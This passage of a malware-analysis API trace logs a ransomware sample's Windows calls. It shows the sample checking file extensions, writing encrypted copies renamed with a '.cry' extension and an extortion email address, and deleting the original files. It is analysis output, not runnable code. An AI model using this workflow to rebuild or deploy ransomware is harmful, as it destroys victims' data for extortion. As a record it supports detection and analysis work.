53 [0049.629] lstrlenW (lpString=".doc") returned 4 [0049.629] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0049.629] lstrlenW (lpString=".docx") returned 5 [0049.629] lstrcmpiW (lpString1=".docx", lpString2="r.png") returned -1 [0049.629] lstrlenW (lpString=".pdf") returned 4 [0049.629] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0049.629] lstrlenW (lpString=".xls") returned 4 [0049.629] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0049.629] lstrlenW (lpString=".xlsx") returned 5 [0049.629] lstrcmpiW (lpString1=".xlsx", lpString2="r.png") returned -1 [0049.629] lstrlenW (lpString=".ppt") returned 4 [0049.629] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0049.629] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.629] lstrlenW (lpString=".zip") returned 4 [0049.629] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0049.629] lstrlenW (lpString=".rar") returned 4 [0049.629] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0049.629] lstrlenW (lpString=".bz2") returned 4 [0049.629] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0049.629] lstrlenW (lpString=".7z") returned 3 [0049.629] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0049.629] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.629] lstrlenW (lpString=".dbf") returned 4 [0049.629] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0049.629] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.629] lstrlenW (lpString=".1cd") returned 4 [0049.629] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0049.629] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.629] lstrlenW (lpString=".jpg") returned 4 [0049.629] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0049.630] lstrcmpiW (lpString1=".png", lpString2=".cry") returned 1 [0049.630] lstrlenW (lpString="NavigationLeft_SelectionSubpicture.png") returned 38 [0049.630] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0050.060] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=3130) returned 1 [0050.062] CloseHandle (hObject=0x21c) returned 1 [0050.063] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_selectionsubpicture.png")) returned 0x20 [0050.072] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_selectionsubpicture.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.072] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.072] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 91 [0050.072] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 91 [0050.072] lstrlenW (lpString=".doc") returned 4 [0050.072] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.072] lstrlenW (lpString=".docx") returned 5 [0050.072] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0050.072] lstrlenW (lpString=".pdf") returned 4 [0050.072] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.072] lstrlenW (lpString=".xls") returned 4 [0050.072] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.072] lstrlenW (lpString=".xlsx") returned 5 [0050.072] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0050.072] lstrlenW (lpString=".ppt") returned 4 [0050.072] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.072] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 91 [0050.072] lstrlenW (lpString=".zip") returned 4 [0050.072] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.072] lstrlenW (lpString=".rar") returned 4 [0050.072] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.073] lstrlenW (lpString=".bz2") returned 4 [0050.073] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.073] lstrlenW (lpString=".7z") returned 3 [0050.073] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.073] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 91 [0050.073] lstrlenW (lpString=".dbf") returned 4 [0050.073] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.073] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 91 [0050.073] lstrlenW (lpString=".1cd") returned 4 [0050.073] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.073] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 91 [0050.073] lstrlenW (lpString=".jpg") returned 4 [0050.073] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.073] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 91 [0050.073] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 91 [0050.073] lstrlenW (lpString=".doc") returned 4 [0050.073] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.073] lstrlenW (lpString=".docx") returned 5 [0050.073] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0050.073] lstrlenW (lpString=".pdf") returned 4 [0050.073] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.073] lstrlenW (lpString=".xls") returned 4 [0050.073] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.073] lstrlenW (lpString=".xlsx") returned 5 [0050.073] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0050.073] lstrlenW (lpString=".ppt") returned 4 [0050.073] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.073] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 91 [0050.073] lstrlenW (lpString=".zip") returned 4 [0050.073] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.073] lstrlenW (lpString=".rar") returned 4 [0050.073] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.073] lstrlenW (lpString=".bz2") returned 4 [0050.073] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.073] lstrlenW (lpString=".7z") returned 3 [0050.073] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.073] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 91 [0050.073] lstrlenW (lpString=".dbf") returned 4 [0050.074] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.074] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 91 [0050.074] lstrlenW (lpString=".1cd") returned 4 [0050.074] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.074] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 91 [0050.074] lstrlenW (lpString=".jpg") returned 4 [0050.074] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.074] lstrcmpiW (lpString1=".wmv", lpString2=".cry") returned 1 [0050.074] lstrlenW (lpString="SportsScenesBackground.wmv") returned 26 [0050.074] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0050.314] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2925684) returned 1 [0050.314] CloseHandle (hObject=0x1bc) returned 1 [0050.314] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv")) returned 0x20 [0050.315] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.315] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0050.315] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0050.315] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0050.315] lstrlenW (lpString=".doc") returned 4 [0050.315] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.315] lstrlenW (lpString=".docx") returned 5 [0050.315] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0050.315] lstrlenW (lpString=".pdf") returned 4 [0050.315] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.315] lstrlenW (lpString=".xls") returned 4 [0050.315] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.315] lstrlenW (lpString=".xlsx") returned 5 [0050.315] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0050.315] lstrlenW (lpString=".ppt") returned 4 [0050.315] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.315] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0050.315] lstrlenW (lpString=".zip") returned 4 [0050.315] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.315] lstrlenW (lpString=".rar") returned 4 [0050.315] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.315] lstrlenW (lpString=".bz2") returned 4 [0050.315] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.315] lstrlenW (lpString=".7z") returned 3 [0050.315] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.315] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0050.315] lstrlenW (lpString=".dbf") returned 4 [0050.315] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.315] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0050.315] lstrlenW (lpString=".1cd") returned 4 [0050.316] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.316] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0050.316] lstrlenW (lpString=".jpg") returned 4 [0050.316] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.316] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0050.316] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0050.316] lstrlenW (lpString=".doc") returned 4 [0050.316] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.316] lstrlenW (lpString=".docx") returned 5 [0050.316] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0050.316] lstrlenW (lpString=".pdf") returned 4 [0050.316] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.316] lstrlenW (lpString=".xls") returned 4 [0050.316] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.316] lstrlenW (lpString=".xlsx") returned 5 [0050.316] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0050.316] lstrlenW (lpString=".ppt") returned 4 [0050.316] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.316] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0050.316] lstrlenW (lpString=".zip") returned 4 [0050.316] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.316] lstrlenW (lpString=".rar") returned 4 [0050.316] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.316] lstrlenW (lpString=".bz2") returned 4 [0050.316] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.316] lstrlenW (lpString=".7z") returned 3 [0050.316] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.316] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0050.316] lstrlenW (lpString=".dbf") returned 4 [0050.316] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.316] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0050.316] lstrlenW (lpString=".1cd") returned 4 [0050.317] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.317] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0050.317] lstrlenW (lpString=".jpg") returned 4 [0050.317] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.317] lstrcmpiW (lpString1=".xsl", lpString2=".cry") returned 1 [0050.317] lstrlenW (lpString="Informix.xsl") returned 12 [0050.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0050.341] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=30948) returned 1 [0050.341] CloseHandle (hObject=0x200) returned 1 [0050.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl")) returned 0x20 [0050.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.341] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0050.341] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.342] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0050.342] GetLastError () returned 0x0 [0050.342] ReadFile (in: hFile=0x200, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x78e4, lpOverlapped=0x0) returned 1 [0050.414] WriteFile (in: hFile=0x194, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x78f0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x78f0, lpOverlapped=0x0) returned 1 [0050.415] ReadFile (in: hFile=0x200, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.415] WriteFile (in: hFile=0x194, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.416] SetEndOfFile (hFile=0x194) returned 1 [0050.644] CloseHandle (hObject=0x194) returned 1 [0050.644] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.644] SetEndOfFile (hFile=0x200) returned 1 [0050.646] CloseHandle (hObject=0x200) returned 1 [0050.647] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.647] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl")) returned 1 [0050.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0050.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0050.647] lstrlenW (lpString=".doc") returned 4 [0050.647] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0050.647] lstrlenW (lpString=".docx") returned 5 [0050.647] lstrcmpiW (lpString1=".docx", lpString2="x.xsl") returned -1 [0050.647] lstrlenW (lpString=".pdf") returned 4 [0050.647] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0050.647] lstrlenW (lpString=".xls") returned 4 [0050.647] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0050.647] lstrlenW (lpString=".xlsx") returned 5 [0050.647] lstrcmpiW (lpString1=".xlsx", lpString2="x.xsl") returned -1 [0050.647] lstrlenW (lpString=".ppt") returned 4 [0050.647] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0050.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0050.647] lstrlenW (lpString=".zip") returned 4 [0050.648] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0050.648] lstrlenW (lpString=".rar") returned 4 [0050.648] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0050.648] lstrlenW (lpString=".bz2") returned 4 [0050.648] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0050.648] lstrlenW (lpString=".7z") returned 3 [0050.648] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0050.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0050.648] lstrlenW (lpString=".dbf") returned 4 [0050.648] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0050.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0050.648] lstrlenW (lpString=".1cd") returned 4 [0050.648] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0050.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0050.648] lstrlenW (lpString=".jpg") returned 4 [0050.648] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0050.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0050.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0050.648] lstrlenW (lpString=".doc") returned 4 [0050.648] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0050.648] lstrlenW (lpString=".docx") returned 5 [0050.648] lstrcmpiW (lpString1=".docx", lpString2="x.xsl") returned -1 [0050.649] lstrlenW (lpString=".pdf") returned 4 [0050.649] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0050.649] lstrlenW (lpString=".xls") returned 4 [0050.649] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0050.649] lstrlenW (lpString=".xlsx") returned 5 [0050.649] lstrcmpiW (lpString1=".xlsx", lpString2="x.xsl") returned -1 [0050.649] lstrlenW (lpString=".ppt") returned 4 [0050.649] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0050.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0050.649] lstrlenW (lpString=".zip") returned 4 [0050.649] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0050.649] lstrlenW (lpString=".rar") returned 4 [0050.649] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0050.649] lstrlenW (lpString=".bz2") returned 4 [0050.649] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0050.649] lstrlenW (lpString=".7z") returned 3 [0050.649] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0050.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0050.649] lstrlenW (lpString=".dbf") returned 4 [0050.649] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0050.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0050.649] lstrlenW (lpString=".1cd") returned 4 [0050.649] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0050.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0050.649] lstrlenW (lpString=".jpg") returned 4 [0050.649] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0050.650] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=39515) returned 1 [0050.650] CloseHandle (hObject=0x200) returned 1 [0050.650] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl")) returned 0x20 [0050.650] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0050.650] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.650] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0050.651] GetLastError () returned 0x0 [0050.651] ReadFile (in: hFile=0x200, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x9a5b, lpOverlapped=0x0) returned 1 [0050.695] WriteFile (in: hFile=0x194, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x9a60, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x9a60, lpOverlapped=0x0) returned 1 [0050.697] ReadFile (in: hFile=0x200, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.697] WriteFile (in: hFile=0x194, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0050.697] SetEndOfFile (hFile=0x194) returned 1 [0050.697] CloseHandle (hObject=0x194) returned 1 [0050.697] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, 